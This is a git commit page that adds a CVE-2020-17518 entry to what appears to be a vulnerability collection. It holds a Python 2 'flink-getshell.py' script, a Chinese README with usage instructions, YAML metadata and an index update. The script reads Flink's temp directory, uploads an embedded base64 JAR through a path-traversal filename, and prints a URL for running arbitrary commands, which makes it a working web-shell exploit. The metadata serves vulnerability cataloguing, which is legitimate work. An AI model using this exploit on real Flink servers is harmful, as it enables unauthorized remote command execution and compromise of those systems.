add CVE-2020-17518
This commit is contained in:
me-zz
Re3et
parent
6788286c8d
commit
f03ad6df9b
|
|
@ -0,0 +1,30 @@
|
|||
import requests
|
||||
import base64
|
||||
import json
|
||||
import sys
|
||||
import cStringIO
|
||||
#jar_code="UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA"
|
||||
def main():
|
||||
if len(sys.argv) == 1 or sys.argv[1] == '-h':
|
||||
print('Usage :python2 flink-getshell.py http://example.com:8081')
|
||||
exit()
|
||||
url = sys.argv[1]
|
||||
jobmanager_config_dir = url + '/jobmanager/config'
|
||||
upload_jar_url = url + "/jars/upload"
|
||||
r1 = requests.get(jobmanager_config_dir,verify=False)
|
||||
#data = json.loads(req.text)[2]['value']
|
||||
data = json.loads(r1.text)
|
||||
for i in data:
|
||||
#print(i['key'])
|
||||
if i['key'] == "web.tmpdir":
|
||||
flink_webdir = i['value']
|
||||
print("webdir:%s" % flink_webdir)
|
||||
file_content = base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA')
|
||||
files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 'application/octet-stream')}
|
||||
r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False)
|
||||
print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,10 @@
|
|||
# Flink-文件上传
|
||||
Apache Flink 文件上传
|
||||
#Use
|
||||
Apache Flink是美国阿帕奇软件(Apache)基金会的一款开源的分布式流数据处理引擎。Apache Flink 1.5.1 引入了一个 REST 处理程序,它允许你通过恶意修改的 HTTP 标头将上传的文件写入本地文件系统上的任意位置。这些文件可以写入 Flink 1.5.1 可访问的任何位置。
|
||||
|
||||
# eg
|
||||
python flink-getshell.py http://example.com:8081
|
||||
|
||||
# reference
|
||||
code from: https://github.com/rakjong/Flink-CVE-2020-17518-getshell
|
||||
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2020-17518
|
||||
source: https://github.com/rakjong/Flink-CVE-2020-17518-getshell
|
||||
info:
|
||||
name: Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。
|
||||
severity: high
|
||||
description:
|
||||
在Apache Flink1.5.1中引入了 REST 处理程序,允许通过恶意修改HTTP HEADER将上传的文件写入本地文件系统上的任意位置。攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置。
|
||||
scope-of-influence:
|
||||
Apache Flink 1.5.1-1.11.2
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2020-17518
|
||||
- https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2020-17518
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-17518
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2020, Apache, Flink, Upload
|
||||
|
|
@ -18,6 +18,8 @@ cve:
|
|||
- CVE-2020-1938
|
||||
apache-Spark:
|
||||
- CVE-2022-33891
|
||||
apache-Flink:
|
||||
- CVE-2020-17518
|
||||
apache-tomcat:
|
||||
- CVE-2020-13935
|
||||
Influx-DB:
|
||||
|
|
@ -114,4 +116,4 @@ kve:
|
|||
kylin-display-switch:
|
||||
- KVE-2022-0206
|
||||
kylin-activation:
|
||||
- KVE-2022-0231
|
||||
- KVE-2022-0231
|
||||
|
|
|
|||
Loading…
Reference in New Issue